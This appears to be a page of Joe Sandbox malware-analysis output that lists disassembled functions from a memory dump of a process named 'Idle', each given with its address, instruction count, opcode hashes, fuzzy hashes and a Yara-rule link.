                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8268e5de9e3de9a87cfd9d941a460b1439363cc1e4c120be406fa6b78a2719c6
                                                                                              • Instruction ID: 20ae838fa0965e1252795775d8106453b7dedad2f877b54bb1285a99f89cba17
                                                                                              • Opcode Fuzzy Hash: 8268e5de9e3de9a87cfd9d941a460b1439363cc1e4c120be406fa6b78a2719c6
                                                                                              • Instruction Fuzzy Hash: 37D14C30E1A61D8FDBA8EF98C460ABCB7B2FF19705F110179D00DA72A2CB796941CB55
                                                                                              Function 00007FFD9BAA32FB Relevance: .3, Instructions: 343COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b5adb51c13940a92f00a6dcecbfff99a6246de774d8bd14b859370da41c4060
                                                                                              • Instruction ID: 751f3993507d36bb190af7ef46bbbdac2d81ce3645d8572e859791dba418e36c
                                                                                              • Opcode Fuzzy Hash: 9b5adb51c13940a92f00a6dcecbfff99a6246de774d8bd14b859370da41c4060
                                                                                              • Instruction Fuzzy Hash: 9CC14D70E0961D8EEBA4EBA8C8547ECB7F1FF58311F0141BAD00DD72A2DB746A948B50
                                                                                              Function 00007FFD9BAA55B1 Relevance: .3, Instructions: 342COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e95194a7b35e63aa2aeb2d198d582f337d7dad246fb36e64d3e2364fe0f496c2
                                                                                              • Instruction ID: 8b5e226b5d2011ad35d8f9971f54d6fdffa64f65d97f4ecb60fbf0a976c538fb
                                                                                              • Opcode Fuzzy Hash: e95194a7b35e63aa2aeb2d198d582f337d7dad246fb36e64d3e2364fe0f496c2
                                                                                              • Instruction Fuzzy Hash: 23C1E430A0E68E8FEB65AF648C692F97BF1FF15310F0505BAD458C71A2EEB86644C741
                                                                                              Function 00007FFD9BA9D298 Relevance: .3, Instructions: 341COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2270addf6dbc89f8beb550128c43b24e550acf420d6d261d4dbf795dee0cd147
                                                                                              • Instruction ID: 8672d3d2efd459fe3bf88c512937d2a65c8bb4e6826e13c5af44c882c5620f0b
                                                                                              • Opcode Fuzzy Hash: 2270addf6dbc89f8beb550128c43b24e550acf420d6d261d4dbf795dee0cd147
                                                                                              • Instruction Fuzzy Hash: 18C18E71A19A5D8FEBA8EF58C8647B8B7A1FF58304F4501BAD04DD71E2CE746980CB41
                                                                                              Function 00007FFD9BAA63A8 Relevance: .3, Instructions: 324COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be3db84d01a72f527472ec363354e4a2e1fc4b972f1d7c80247f50a2e4d84265
                                                                                              • Instruction ID: a92d36998a575b494565e01bb5772a1179ad0358e546e66e42941a05cf8feafe
                                                                                              • Opcode Fuzzy Hash: be3db84d01a72f527472ec363354e4a2e1fc4b972f1d7c80247f50a2e4d84265
                                                                                              • Instruction Fuzzy Hash: 2CB1047190E7CA4FD7569F6888351A93FB1EF17310F0A04EBD488CB1E3DA686549CB62
                                                                                              Function 00007FFD9BAA1BB0 Relevance: .3, Instructions: 323COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9632c911d45e736bd786f9a17680fffb6542119d1675d5a84cbbd88bab159110
                                                                                              • Instruction ID: a2e16037a185bec2fa950b491942ef8a6d1dc22d5448d78459b3ab7fdc445441
                                                                                              • Opcode Fuzzy Hash: 9632c911d45e736bd786f9a17680fffb6542119d1675d5a84cbbd88bab159110
                                                                                              • Instruction Fuzzy Hash: 9CB18C30A0964E9FDB68EFA4C4A46FE7BF1FF29300F11457AE409D71A1DA78A644CB50
                                                                                              Function 00007FFD9BA92145 Relevance: .3, Instructions: 314COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54aff87bde78ff71de9451f3c6428bd1be8605b8f577c8cd24a04b6de5330a2d
                                                                                              • Instruction ID: f9a84f56bd0fbbd3ce9f58784092a6295630afecbca7cdefcba62b12b0a9df19
                                                                                              • Opcode Fuzzy Hash: 54aff87bde78ff71de9451f3c6428bd1be8605b8f577c8cd24a04b6de5330a2d
                                                                                              • Instruction Fuzzy Hash: 69A1D431A0E65E4FEB79DBA4C8657F9B7A0EF45300F0201BAD00DD71E2DEB86A459B41
                                                                                              Function 00007FFD9BA9A860 Relevance: .3, Instructions: 314COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f3c637fce6bfd87a9d3efdd140810cb4edfaad7b9b77b68fb720724870b1bd95
                                                                                              • Instruction ID: 708e7048a564de5400619fcae39ea226d8b28a00d352e9bf31bcbb6d4549427b
                                                                                              • Opcode Fuzzy Hash: f3c637fce6bfd87a9d3efdd140810cb4edfaad7b9b77b68fb720724870b1bd95
                                                                                              • Instruction Fuzzy Hash: 9EB1E130A0E64E8FEB64EF648C696F97BB1FF19310F0505BAD40DC61A2DEB86644CB51
                                                                                              Function 00007FFD9BA930AB Relevance: .3, Instructions: 313COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8936caa7e6879128f71da385b27feaf300607962bfe8505a5e5d7077fc33360f
                                                                                              • Instruction ID: acc6121375477d156856d9935e9e60d3aa011cabab89d243fc9108c57da409ca
                                                                                              • Opcode Fuzzy Hash: 8936caa7e6879128f71da385b27feaf300607962bfe8505a5e5d7077fc33360f
                                                                                              • Instruction Fuzzy Hash: 05B1A130E0E64D8FEB65EBA4C8686ED7BF0EF59304F1245B6D409C71A2DA78A644DB01
                                                                                              Function 00007FFD9BA9D318 Relevance: .3, Instructions: 303COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 599d2197d4227cb9a3ab4f829db39137cecb7caadc5302080fb4b0dd07a0faf6
                                                                                              • Instruction ID: 17282ce1b1190d3d6662e932cd06c9cb6b575f92c853a06359fdd0845d306c81
                                                                                              • Opcode Fuzzy Hash: 599d2197d4227cb9a3ab4f829db39137cecb7caadc5302080fb4b0dd07a0faf6
                                                                                              • Instruction Fuzzy Hash: 9CB17D71E19A5D8FEBA8EB58C8647B8B7A1FF58304F4401B9D04DD72E2CE786980DB41
                                                                                              Function 00007FFD9BA9A718 Relevance: .3, Instructions: 303COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c8531e40d12f44262b4e09720339cbd7d5c991402f1ccc24d53138d193d75059
                                                                                              • Instruction ID: 1ca2a22767adeffdb1104e0fa37e5175bb47d9c8c7644c1cf796c068b3fca820
                                                                                              • Opcode Fuzzy Hash: c8531e40d12f44262b4e09720339cbd7d5c991402f1ccc24d53138d193d75059
                                                                                              • Instruction Fuzzy Hash: CAB1D530A0E68E8FDB55DF6488256FA3BF1FF26300F0541BBD459C71A2DA78A644CB51
                                                                                              Function 00007FFD9BA9D320 Relevance: .3, Instructions: 302COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2bb9ca42c1de154627193250c2afdd1ffed42f2eb74deb8ba7b3797e0a2c4d22
                                                                                              • Instruction ID: ec6c42ca1034fe464ac92f44e3a5f970ceee06eaf79cfb1beca740bf29dff212
                                                                                              • Opcode Fuzzy Hash: 2bb9ca42c1de154627193250c2afdd1ffed42f2eb74deb8ba7b3797e0a2c4d22
                                                                                              • Instruction Fuzzy Hash: EAB17D71E19A5D8FEBA8EB58C864BB8B7A1FF58304F4401B9D04DD72E2CE746980CB41
                                                                                              Function 00007FFD9BAA1AF3 Relevance: .3, Instructions: 300COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 90acd0a438b64a4410e2ae4567dd2b402e7fb6fe25fb73b39e7f8c574fdd5f3c
                                                                                              • Instruction ID: 30257f10ebd0ec6b539b7f3a74741fa53e965e92f290a6b31bc5c97ab0438675
                                                                                              • Opcode Fuzzy Hash: 90acd0a438b64a4410e2ae4567dd2b402e7fb6fe25fb73b39e7f8c574fdd5f3c
                                                                                              • Instruction Fuzzy Hash: 83A1C130E0E38E9FDB659F6488652F97FF1EF16300F0541BAE449C71A2EA78A644CB51
                                                                                              Function 00007FFD9BA91BE5 Relevance: .3, Instructions: 299COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86a33b53152691a627c1f9c1398a9038bc3f92b09d93750c23044580903546cd
                                                                                              • Instruction ID: 0caab5e88d3ef4b4bba6ba04cc3414f0b4d2cc3db52a9d32f361d2ea68110293
                                                                                              • Opcode Fuzzy Hash: 86a33b53152691a627c1f9c1398a9038bc3f92b09d93750c23044580903546cd
                                                                                              • Instruction Fuzzy Hash: 47915631A0DB8E8FDB59DF1888655B97BE1FFA9300F0501BEE459C72A2DA74A901C781
                                                                                              Function 00007FFD9BA9BDB8 Relevance: .3, Instructions: 297COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 017344a8ae7136f12ff11bd7a60e0ae298eb0ffa3049a982b879caf9d9f9f4f9
                                                                                              • Instruction ID: f7448dd0abcf3f194466051d1bb68d1cf228d04e0fb05e378b3c0ee03bb7f8bd
                                                                                              • Opcode Fuzzy Hash: 017344a8ae7136f12ff11bd7a60e0ae298eb0ffa3049a982b879caf9d9f9f4f9
                                                                                              • Instruction Fuzzy Hash: E5B1AF3094E7CE8FDB569F6488296EA7FB0FF06300F0645EBD458C70A2DA789658C741
                                                                                              Function 00007FFD9BAA4920 Relevance: .3, Instructions: 286COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b849cf2eec41c0fb6a4ba4ece2b33f1dd6ebf8bdd0b4ba2acc7e9263e626dac7
                                                                                              • Instruction ID: 10f7ad46c87b275b1b74ed7fea2e46bb61010fa80aff7f0addf59d17e2bf81aa
                                                                                              • Opcode Fuzzy Hash: b849cf2eec41c0fb6a4ba4ece2b33f1dd6ebf8bdd0b4ba2acc7e9263e626dac7
                                                                                              • Instruction Fuzzy Hash: A4915131A19A4D8FEBA4EBA8C8A56EDB7F1FF19300F41057EE40DD31A2DE7469418B41
                                                                                              Function 00007FFD9BA9A8FB Relevance: .3, Instructions: 283COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 68e9c4a56bd9aa0ef7d7d654b7d3ac8be8a8e222b2f4351e55ba57408807f12d
                                                                                              • Instruction ID: b3e30fb99a758386c5b25576dfb6ae8ed5e10645aa292e6a4060d2479d0b91f8
                                                                                              • Opcode Fuzzy Hash: 68e9c4a56bd9aa0ef7d7d654b7d3ac8be8a8e222b2f4351e55ba57408807f12d
                                                                                              • Instruction Fuzzy Hash: ED910335A0E64E8FE765ABA4C8696FD7BE0FF45310F0245B7D418C60E2EE78AA448741
                                                                                              Function 00007FFD9BA9A5A8 Relevance: .3, Instructions: 283COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cf7b8d8e9f10dd6ba4c1c3ad73103afd50cbb6e44cd7b15f911f3dae476f69b7
                                                                                              • Instruction ID: 5122f3a3be426a7b420962980b536c505a5c5cc14d15a35bf1474a45f8000de2
                                                                                              • Opcode Fuzzy Hash: cf7b8d8e9f10dd6ba4c1c3ad73103afd50cbb6e44cd7b15f911f3dae476f69b7
                                                                                              • Instruction Fuzzy Hash: 94A1A030E0A24E9FDB659F64C8652FE7BF1FF26300F01457AE419C71A1EA78A644CB51
                                                                                              Function 00007FFD9BA9A79D Relevance: .3, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 282709651231f0102d18c44cd68bc3938a72c0ba3b2efbe961439ccfd3a4e98d
                                                                                              • Instruction ID: 9c753c789c5925470f769579dfd0fbd8020a55c955e5a956c94219c106cc23cd
                                                                                              • Opcode Fuzzy Hash: 282709651231f0102d18c44cd68bc3938a72c0ba3b2efbe961439ccfd3a4e98d
                                                                                              • Instruction Fuzzy Hash: 9F91B430A0E78E8FDB65AF688C692FA7FB0FF15305F0505BBD458C21A2DB78A6548741
                                                                                              Function 00007FFD9BA916E8 Relevance: .3, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 544e59f05d6cf4dc075ac617d931c04a83e7ead84568dd21fc4b3663aafa45ee
                                                                                              • Instruction ID: e387e0945d356b074096841416e7ae426da61bb1b761d0b141bb85cd94891b65
                                                                                              • Opcode Fuzzy Hash: 544e59f05d6cf4dc075ac617d931c04a83e7ead84568dd21fc4b3663aafa45ee
                                                                                              • Instruction Fuzzy Hash: F281F031B1DA4D4FEB58DF5C88615B977E2EFE8300B15417AE45EC32A6DE34AC028781
                                                                                              Function 00007FFD9BAA4919 Relevance: .3, Instructions: 275COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9341a3b279c7b6811771a92804029cfe07307b44be51f7e19d1216eb1fcf7cc2
                                                                                              • Instruction ID: 53bad6a89794065bee9720a4e3db9e7c41d9e7f83e029b44c70cfa1125361c07
                                                                                              • Opcode Fuzzy Hash: 9341a3b279c7b6811771a92804029cfe07307b44be51f7e19d1216eb1fcf7cc2
                                                                                              • Instruction Fuzzy Hash: 9D915171E19A4D8FEBA4EFA888A56EDBBE1FF15300F41017AE40DD31A2DE7469448B41
                                                                                              Function 00007FFD9BAA04DD Relevance: .3, Instructions: 275COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a742f1f147faf4ddd6eeb9a223ce40d6bce567d36487d4a44332e5c8fdca44d1
                                                                                              • Instruction ID: f350ef2443db4300c3675bd28430da36d801ede696c9b59d09075232e58a8107
                                                                                              • Opcode Fuzzy Hash: a742f1f147faf4ddd6eeb9a223ce40d6bce567d36487d4a44332e5c8fdca44d1
                                                                                              • Instruction Fuzzy Hash: 1CA1B23090E78E8FDBA5DF6488292FA3BB1FF15700F0545BAD85CC61A2DB78A654CB41
                                                                                              Function 00007FFD9BA9A72D Relevance: .3, Instructions: 270COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8e21873b1eaff45b741d32081f7629c0948aea66e51754736aafe5a1a985dc61
                                                                                              • Instruction ID: f20cd0da55b17ab8947416881ce748aabd08f35b8f2ac2a2f73db68694000396
                                                                                              • Opcode Fuzzy Hash: 8e21873b1eaff45b741d32081f7629c0948aea66e51754736aafe5a1a985dc61
                                                                                              • Instruction Fuzzy Hash: 1F91D530A0E68E8FDB65DF6888692FA3BB1FF15315F0105BBE81CC61A2DB786544C751
                                                                                              Function 00007FFD9BA905F0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c8bc72abe1c730b94e316f27732e9e14dd90087b80bfcd563ae7dfb6920a3d4
                                                                                              • Instruction ID: f75e014b38280f12bf5b5c5f899b024f10263045811be2d75ec0e5ad85e34953
                                                                                              • Opcode Fuzzy Hash: 3c8bc72abe1c730b94e316f27732e9e14dd90087b80bfcd563ae7dfb6920a3d4
                                                                                              • Instruction Fuzzy Hash: B5810330B19B4E8FDB58DF5888645BA77E1FFA8300F11457EE41AC72A2DE74A902C781
                                                                                              Function 00007FFD9BA9B4F8 Relevance: .3, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3daa3411a9f4023cdc49af1a90addeeb7550d7bb0b0a2a2aa61ee7bcc6ffa5e8
                                                                                              • Instruction ID: e9e7ec42542fcf1f0336f9029591899bac493f2872f296d64ef402374350caf7
                                                                                              • Opcode Fuzzy Hash: 3daa3411a9f4023cdc49af1a90addeeb7550d7bb0b0a2a2aa61ee7bcc6ffa5e8
                                                                                              • Instruction Fuzzy Hash: BFA19F30E1A64E8FEB65DFA488642FD7BF0FF09300F4145BAD509D71A2DAB8A644DB41
                                                                                              Function 00007FFD9BA9A851 Relevance: .3, Instructions: 255COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40d7a1920cb562bfec6e17a47a35b7ddfd6c8ebb32d1ed6222fb4e88a1574d2d
                                                                                              • Instruction ID: 426edc4f1ebd162d7798bdd8f34a3d37e7da68b86327f7b19dd69cad451a306b
                                                                                              • Opcode Fuzzy Hash: 40d7a1920cb562bfec6e17a47a35b7ddfd6c8ebb32d1ed6222fb4e88a1574d2d
                                                                                              • Instruction Fuzzy Hash: 4E817030A1E78E8FEB65AF648C292F97FF0FF15301F0105BAD419C61A2DBB8A6548741
                                                                                              Function 00007FFD9BAA4988 Relevance: .2, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: effe4bcd067d063062a388d83abc20401a5f7716d2d75d8d627138b2fd54c90d
                                                                                              • Instruction ID: 772ab21b00849371d41183061298595ef4f173ec3096b0e5cfbba0aa5ee16dd7
                                                                                              • Opcode Fuzzy Hash: effe4bcd067d063062a388d83abc20401a5f7716d2d75d8d627138b2fd54c90d
                                                                                              • Instruction Fuzzy Hash: 78814E70A19A5D8FEBA4EFA888656ADBBB1FF19300F41017AE40DD31A2DE7469418B40
                                                                                              Function 00007FFD9BAA56D8 Relevance: .2, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c8b1a8f67c8cea109a9a663e510b327c645d23baab6a9dc6cf4130262a8c28ce
                                                                                              • Instruction ID: 1fc311d006d58282a198da66ec947f1fc2906ded04d4ee138c8095f9f11b1ff5
                                                                                              • Opcode Fuzzy Hash: c8b1a8f67c8cea109a9a663e510b327c645d23baab6a9dc6cf4130262a8c28ce
                                                                                              • Instruction Fuzzy Hash: 2781E431A0E68E8FEB65AB648C692F97BB1FF05310F0505BAD44CC61E3EEB86644C751
                                                                                              Function 00007FFD9BA92A70 Relevance: .2, Instructions: 226COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 671e49ceaa32de91892406949bf03e9b7e234f84617b486d3b8f5f218835dcf3
                                                                                              • Instruction ID: 0c886566a89df596994da2eb4cae80d30039d900f32df5524a35a18d17b62274
                                                                                              • Opcode Fuzzy Hash: 671e49ceaa32de91892406949bf03e9b7e234f84617b486d3b8f5f218835dcf3
